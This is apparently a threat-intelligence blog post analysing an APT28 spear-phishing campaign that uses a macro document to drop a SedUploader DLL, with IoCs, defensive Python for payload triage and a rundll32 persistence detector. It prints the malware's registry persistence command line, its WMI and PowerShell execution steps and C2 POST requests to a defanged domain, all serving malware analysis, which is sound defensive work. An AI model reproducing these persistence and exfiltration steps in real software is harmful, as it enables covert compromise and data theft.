APT28, aka Fancy Bear, the well-known hacker group believed to be Russian state-sponsored, appears to be targeting NATO partners and defense / military institutions at the time of writing. Spear-phishing emails with an attached malicious document referring to a "NATO simulation" event (the document is named "NATO Simulation.doc") seem to be used to try to compromise some institutional entities (likely from northern / eastern Europe).
The hunting group involved in the analysis of this event is composed of @MD0ugh, @DrunkBinary, @r0ny_123, @Manu_De_Lucia.
Thanks to @MD0ugh for sharing the sample with all of us.
The document has been designed to drop a first malicious component, likely belonging to the APT28 / Fancy Bear arsenal.
A quite high rate of code reuse and internal analysis confirm it is a SedUploader variant.
Metadata and other investigations suggest that the malicious infrastructure and components were set up only a few days ago (at the end of November 2018).
[Images: domain name creation date and service setup]
On the basis of what I can observe in samples and public data, the following is a timeline reconstruction of the development of the operation:
A screenshot of part of the attached decoy is shown below:
This spear-phishing document (md5: 43D7FFD611932CF51D7150B176ECFC29) is armed with macro code designed to work primarily through the main event, controlled by the AutoOpen() sub.
At offset 0x00006460 lies the embedded .bin content.
On macro activation, the instructions read a specific XML node of the document itself through an XML parser and extract and decode the base64-encoded content selected via an XPath expression.
The extracted VBA macro code seems very similar to that previously used in the APT28 / Fancy Bear "hospitality campaign".
The following image compares an extract of the two codes:
The payload is nothing more than a PE DLL executable file.
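To make the extract / decode step concrete for triage, here is an added Python reconstruction of that logic (example code written for this post, not the macro itself nor any tool from the group under analysis). The XML part, the node name, the `id` attribute, the XPath and the fake PE bytes are all constructed for the example; the real document's node and XPath are not reproduced here. The script selects the node via XPath, strips wrapping whitespace, does a strict base64 decode, checks for a plausible PE header (MZ stub plus `PE\0\0` at `e_lfanew`) and hashes the result so it can be matched against the IoCs.

```python
import base64
import hashlib
import struct
import xml.etree.ElementTree as ET

# --- constructed sample input (assumption: not from the real document) -------
# A minimal fake PE image: 'MZ' stub, e_lfanew at offset 0x3C pointing to a
# 'PE\0\0' signature at offset 0x40. Only the header fields checked below are
# meaningful; everything else is zero padding.
FAKE_PE = (
    b"MZ" + b"\x00" * 58          # DOS header up to e_lfanew (offset 0x3C)
    + struct.pack("<I", 0x40)     # e_lfanew -> PE signature at 0x40
    + b"PE\x00\x00" + b"\x00" * 20
)

# Stand-in for the XML part the macro reads. The node name ('data'), the 'id'
# attribute and the XPath below are assumptions made for this example.
SAMPLE_XML = (
    "<root>"
    "<meta name='title'>NATO Simulation</meta>"
    "<data id='payload'>\n" + base64.b64encode(FAKE_PE).decode() + "\n</data>"
    "</root>"
)
PAYLOAD_XPATH = ".//data[@id='payload']"


def extract_b64_node(xml_text, xpath):
    """Select the node holding the base64 blob via XPath, as the macro does."""
    node = ET.fromstring(xml_text).find(xpath)
    if node is None or not node.text:
        raise ValueError("no payload node at %s" % xpath)
    # Base64 in XML is usually line-wrapped; strip all whitespace first.
    return "".join(node.text.split())


def decode_payload(b64_text):
    """Strict decode: garbage in the blob raises instead of silently truncating."""
    return base64.b64decode(b64_text, validate=True)


def is_pe(data):
    """Cheap PE header check: 'MZ' stub and 'PE\\0\\0' at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def triage(xml_text, xpath):
    """Emulate the macro's extract/decode step and summarise what it would drop."""
    blob = decode_payload(extract_b64_node(xml_text, xpath))
    return {
        "size": len(blob),
        "is_pe": is_pe(blob),
        "md5": md5_hex(blob),
        "sha256": hashlib.sha256(blob).hexdigest(),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_XML, PAYLOAD_XPATH))
```

Against a real sample you would point `PAYLOAD_XPATH` at the node the macro actually queries and feed the corresponding XML part in; the MD5 printed is what to compare with the 549726B8BFB1919A343AC764D48FDC81 hash listed in the IoCs.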
It is dropped under:
The files are written with the vbHidden attribute.
Part of the base64-encoded payload follows:
The macro instructions within the AutoOpen() sub are also designed to achieve persistence, writing under the following registry key
with a REG_SZ value
“C:\Windows\System32\rundll32.exe “%ALLUSERSPROFILE%\UpdaterUI.dll “, “#1″”
The first run is performed through WMI.
AutoClose() has similar functionality, writing a PE with a randomly generated name under %TEMP%, which appears to be executed via PowerShell.
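The persistence value above combines three things a defender can key on: rundll32 loading a DLL from a user-writable location (%ALLUSERSPROFILE%), the export referenced by ordinal (#1) rather than by name, and, for the first run, a process tree rooted in WMI (WmiPrvSE.exe hosts WMI-initiated process creation). The following Python check is an added example written for this post, not code from the page or from any detection product; the event records, the list of writable prefixes and the list of unusual parent processes are constructed assumptions, and the regex only handles the quoting styles shown in the sample records.

```python
import re

# Matches "rundll32[.exe] <dll>,<entry>" in the quoting styles seen in Run
# values and process command lines, e.g.
#   rundll32.exe "%ALLUSERSPROFILE%\UpdaterUI.dll ", "#1"
#   rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL
RUNDLL32_RE = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+?)\s*"?\s*,\s*"?(?P<entry>[^"\s]+)"?',
    re.IGNORECASE,
)

# Locations a macro running as the user can write to. Both the %VAR% form and
# the usual expanded paths are listed because Run values keep the variable
# while process logs record the expanded path. (Assumed list for this example.)
WRITABLE_PREFIXES = (
    "%allusersprofile%", "%programdata%", "%temp%", "%tmp%", "%appdata%",
    "%localappdata%", "c:\\programdata\\", "c:\\users\\",
)

# Parents that rarely have a legitimate reason to spawn rundll32. WmiPrvSE.exe
# is the host for WMI-initiated process creation, which is how the first run
# described above would show up. (Assumed list for this example.)
ODD_PARENTS = {"wmiprvse.exe", "winword.exe", "excel.exe", "powershell.exe"}


def analyse_rundll32(cmdline, parent=None):
    """Return the reasons a command line matches this persistence pattern.
    An empty list means nothing matched (or it is not a rundll32 invocation)."""
    m = RUNDLL32_RE.search(cmdline)
    if not m:
        return []
    dll = m.group("dll").strip()
    entry = m.group("entry")
    reasons = []
    if dll.lower().startswith(WRITABLE_PREFIXES):
        reasons.append("DLL in user-writable location: " + dll)
    if entry.startswith("#"):
        reasons.append("export invoked by ordinal: " + entry)
    if parent and parent.lower() in ODD_PARENTS:
        reasons.append("unusual parent process: " + parent)
    return reasons


# Constructed records (not real telemetry): one autorun value shaped like the
# one on the page, a process-creation record for the WMI first run, a benign
# autorun and a benign process.
SAMPLE_EVENTS = [
    {"source": "autorun", "parent": None,
     "cmd": 'C:\\Windows\\System32\\rundll32.exe "%ALLUSERSPROFILE%\\UpdaterUI.dll ", "#1"'},
    {"source": "process", "parent": "WmiPrvSE.exe",
     "cmd": 'C:\\Windows\\System32\\rundll32.exe "C:\\ProgramData\\UpdaterUI.dll", #1'},
    {"source": "autorun", "parent": None,
     "cmd": "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
    {"source": "process", "parent": "services.exe",
     "cmd": '"C:\\Program Files\\Vendor\\updater.exe" /silent'},
]


def scan(events):
    """Run the check over a batch of records and keep only the flagged ones."""
    hits = []
    for ev in events:
        reasons = analyse_rundll32(ev["cmd"], ev.get("parent"))
        if reasons:
            hits.append((ev["source"], reasons))
    return hits


if __name__ == "__main__":
    for source, reasons in scan(SAMPLE_EVENTS):
        print(source, "->", "; ".join(reasons))
```

Each signal alone is noisy (plenty of legitimate software lives in ProgramData, and some installers call exports by ordinal); the value is in requiring two or more of them together, which is what the shell32 record is there to show: it parses fine but raises no reason.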
The dropped content seems to be a SedUploader variant, identified by MD5 hash: 549726B8BFB1919A343AC764D48FDC81
Some details:
From the malware components under my lens, the actor is employing the same TTPs observed in similar operations conducted in the past.
I first performed a static / comparative code analysis of the malicious executable, obtaining the following results:
The malware family was later confirmed by the Intezer platform. View their report here.
Looking at some DNS statistical hits observed for the extracted domain name, it may be that at least one of these spear-phishing documents achieved first-phase access. Obviously this is not certain [there are really still few statistics about it].
Finally, a quick high-level breakdown of the malware's main loop is reported below:
The outside world is contacted through requests like these:
[+] POST hxxps://beatguitar.com/aadv/gJNn/X2/ep/VQOA/3.SMPTE292M/?ct=+lMQKtXi0kf+3MVk38U=
[+] POST hxxps://beatguitar.com/n2qqSy/HPSe0/SY/yAsFy8/mSaYZP/lw.sip/?n=VxL0BnijNmtTnSFIcoQ=
after collecting several pieces of information about the victim system and performing some minimal anti-VM and connectivity checks [requesting legitimate services].
The first list of IoCs reported and the components under analysis are compatible with the modus operandi of the group in question (domain registration, technologies in place, components, fingerprint). The activity is also in line with the actor's mission.
At the time of writing, some other malicious domain names possibly related to the campaign are under investigation. Analysis is ongoing.
domain name: beatguitar[.]com
md5: 43D7FFD611932CF51D7150B176ECFC29 [Spear-phishing DOC]
md5: 549726B8BFB1919A343AC764D48FDC81 [SedUploader / SofacyCarberp]
File name: NATO Simulation.doc
File name: UpdaterUI.dll
File name: Uplist.dat
FireEye: APT28 targets hospitality sector
PaloAlto Unit42: Sofacy Attacks Multiple Government Entities
CSECybSec: APT28 – Hospitality Malware
ESET Research: Sednit update: Analysis of Zebrocy